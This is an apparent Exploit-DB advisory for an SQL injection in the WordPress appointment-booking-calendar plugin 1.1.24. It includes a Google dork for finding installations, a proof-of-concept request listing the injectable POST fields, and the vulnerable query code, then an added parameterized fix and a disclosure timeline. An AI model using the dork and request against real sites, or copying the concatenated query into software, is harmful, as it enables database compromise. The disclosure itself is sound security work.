WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection

EDB-ID: 39342
CVE: N/A
Platform: PHP
Date: 2016-01-27


# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vendor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

critical

================================
TECHNICAL DETAILS && DESCRIPTION
================================

A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.

The flaw was found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is added with the ´init´ tag, so its function is called every time the parameter
´action=cpabc_appointments_calendar_update´ appears in the query string (GET request) or in a POST request.

To exploit this vulnerability successfully, we need a vulnerable WordPress site with a special character set that allows
bypassing the ´addslashes´ function (called automatically and applied to all $_POST and $_GET variables by the WordPress
´wp_magic_quotes´ function), and we also need to own a calendar (it could be owned through privilege escalation) or be a
user with the ´edit_pages´ permission (admin|editor).

The security risk of SQL injection vulnerabilities is extremely high because, by using this type of flaw, an attacker
can compromise the entire web server.

================
PROOF OF CONCEPT
================

An unauthenticated attacker can make a request like...

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>

Example:

	Exploiting simple SQL injection:

	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
	&cpabc_calendar_update=1&id=1
	
	Post data:
	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&timeWorkingDates6

All post variables are vulnerable to SQLi with ´addslashes´ bypass.

===============
VULNERABLE CODE
===============

located in ´cpabc_appointments.php´

function cpabc_appointments_calendar_update() {
    global $wpdb, $user_ID;

	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
		return;

    $calid = intval(str_replace  (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
    if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
        return;
echo "sa";
    cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');

    //@ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");
    if ( $user_ID )    
        $wpdb->query("update  ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
		."='".$_POST["timeWorkingDates6"]."'  where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);

    exit();
}


===========


Note:
The cpabc_appointments_calendar_update2() function is also vulnerable to the same exploit explained here.
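
As a remediation reference for the query shown under VULNERABLE CODE (an added example, not code from the plugin and not the vendor's 1.1.25 change): the same update routed through ´$wpdb->update()´, so that values are escaped by the database driver instead of relying on ´addslashes´. It assumes a WordPress runtime with the plugin's CPABC_* constants and ´cpabc_appointments_user_access_to()´ loaded; the function name is hypothetical.

```php
<?php
// Added example; the function name is hypothetical. Assumes a WordPress runtime
// with the plugin's CPABC_* constants and cpabc_appointments_user_access_to().
function cpabc_appointments_calendar_update_hardened() {
    global $wpdb;

    if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] !== '1' ) {
        return;
    }
    // Require a logged-in user before any authorization decision or write.
    if ( ! is_user_logged_in() ) {
        return;
    }

    $raw_id = ( isset( $_GET['id'] ) && is_string( $_GET['id'] ) ) ? wp_unslash( $_GET['id'] ) : '';
    $calid  = intval( str_replace( CPABC_TDEAPP_CAL_PREFIX, '', $raw_id ) );
    if ( ! current_user_can( 'edit_pages' ) && ! cpabc_appointments_user_access_to( $calid ) ) {
        return;
    }

    // Column => POST field, the same mapping as the original query.
    $fields = array(
        'specialDates'                      => 'specialDates',
        CPABC_TDEAPP_CONFIG_WORKINGDATES    => 'workingDates',
        CPABC_TDEAPP_CONFIG_RESTRICTEDDATES => 'restrictedDates',
    );
    for ( $i = 0; $i <= 6; $i++ ) {
        $fields[ constant( 'CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES' . $i ) ] = 'timeWorkingDates' . $i;
    }

    $data = array();
    foreach ( $fields as $column => $key ) {
        // Undo wp_magic_quotes so the value is escaped exactly once, by wpdb.
        $ok              = isset( $_POST[ $key ] ) && is_string( $_POST[ $key ] );
        $data[ $column ] = $ok ? wp_unslash( $_POST[ $key ] ) : '';
    }

    // wpdb::update() builds the statement through wpdb::prepare(): every value is
    // bound as %s / %d and escaped by the database driver, not by addslashes.
    $wpdb->update(
        CPABC_TDEAPP_CONFIG,
        $data,
        array( CPABC_TDEAPP_CONFIG_ID => $calid ),
        array_fill( 0, count( $data ), '%s' ),
        array( '%d' )
    );
    exit();
}
```

The same change applies to ´cpabc_appointments_calendar_update2()´, which the note above reports as vulnerable in the same way.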


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	strparser[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclosure